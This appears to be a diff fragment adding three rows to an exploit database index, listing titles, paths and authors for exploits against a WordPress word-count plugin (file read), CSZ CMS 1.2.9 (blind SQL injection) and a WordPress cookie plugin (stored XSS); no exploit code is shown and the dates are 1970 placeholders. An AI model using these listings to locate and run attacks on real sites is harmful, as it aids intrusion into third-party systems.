+50845,exploits/php/webapps/50845.txt,"WordPress Plugin admin-word-count-column 2.2 - Local File Read",1970-01-01,"Hassan Khan Yusufzai",webapps,php,
+50846,exploits/php/webapps/50846.txt,"CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated)",1970-01-01,"Rahad Chowdhury",webapps,php,
+50849,exploits/php/webapps/50849.txt,"WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS",1970-01-01,0xB9,webapps,php,